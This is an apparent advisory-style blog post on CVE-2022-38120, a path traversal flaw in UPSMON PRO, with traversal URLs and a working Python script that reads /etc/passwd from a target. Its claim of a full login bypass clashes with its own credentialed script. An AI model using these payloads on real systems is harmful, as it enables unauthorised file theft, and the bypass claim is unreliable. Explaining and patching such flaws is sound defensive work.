CVE-2022-38120 - How a Simple Path Traversal Flaw in UPSMON PRO Exposes Critical System Files

---

Introduction

In September 2022, a dangerous path traversal vulnerability was found in UPSMON PRO—an uninterruptible power supply (UPS) management tool used by organizations to monitor and control their power hardware. Labeled CVE-2022-38120, this bug can let a regular user read any file on the server—even those that should be top secret. With a simple trick, an attacker could completely bypass login protections and look at sensitive system files, configuration secrets, and more.

If you use UPSMON PRO, act now. In this article, we explain this vulnerability in plain language, give an easy exploit example, and show how dangerous it can be.

What Is Path Traversal?

Path traversal (or directory traversal) means tricking a web app into showing or letting you grab files that are outside the folder it's supposed to allow. Imagine asking the app for ../../etc/passwd instead of your regular files, letting you jump back ("traverse") up the folder tree on the server.

Product: UPSMON PRO

- CVE: CVE-2022-38120

How Does This Vulnerability Work?

UPSMON PRO has a page where users can download log or config files. The filename you request is taken directly from the web request—with no checks.

For instance, a regular link might be

http://<server>/download?file=log/today.log

But UPSMON PRO doesn’t sanitize the filename. An attacker can ask for

http://<server>/download?file=../../../../etc/passwd

If the server runs on Linux, this file (/etc/passwd) lists usernames and could help an attacker escalate their attack.

Here's a simple Python script to grab /etc/passwd from a vulnerable UPSMON PRO instance

import requests

# Replace with actual credentials and target
USERNAME = "user"
PASSWORD = "password"
TARGET = "http://target-ip/download?file=../../../../etc/passwd";

session = requests.Session()
session.auth = (USERNAME, PASSWORD)

response = session.get(TARGET)
if response.status_code == 200:
    print("[+] File content:")
    print(response.text)
else:
    print("[-] Failed to grab file.")

Note: On Windows, you could try requesting ../../../../windows/win.ini or similar.

Proof of Attack

If the server is vulnerable, you’ll see the full content of /etc/passwd printed in your terminal. An attacker could use this not only to read secrets but to help them attack further, like trying to crack user passwords.

Why Is This Dangerous?

- Sensitive data exposure: Configuration files, password files, database credentials—all can be stolen.
- Privilege escalation: With access to system files, attackers may find a way to gain admin access.

How Can You Protect Yourself?

- Update: Check for any patches or updates from UPSMON PRO's website.
- Web app firewall: Use a WAF to block requests with ../ or suspicious file paths.

References

- NVD CVE-2022-38120
- Path Traversal on OWASP
- UPSMON PRO Vendor Page (Archived)

Final Thoughts

CVE-2022-38120 is a perfect example of how small programming oversights—like not sanitizing file paths—can lead to major hacks. If you’re an admin running UPSMON PRO, review your versions right away, and patch fast. Attackers don’t need much to turn this flaw into a disaster for your organization.

Protect your systems. A simple mistake shouldn’t become a critical leak!


*Content written exclusively for your request. Feel free to share or use as needed.*

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:22:00 UTC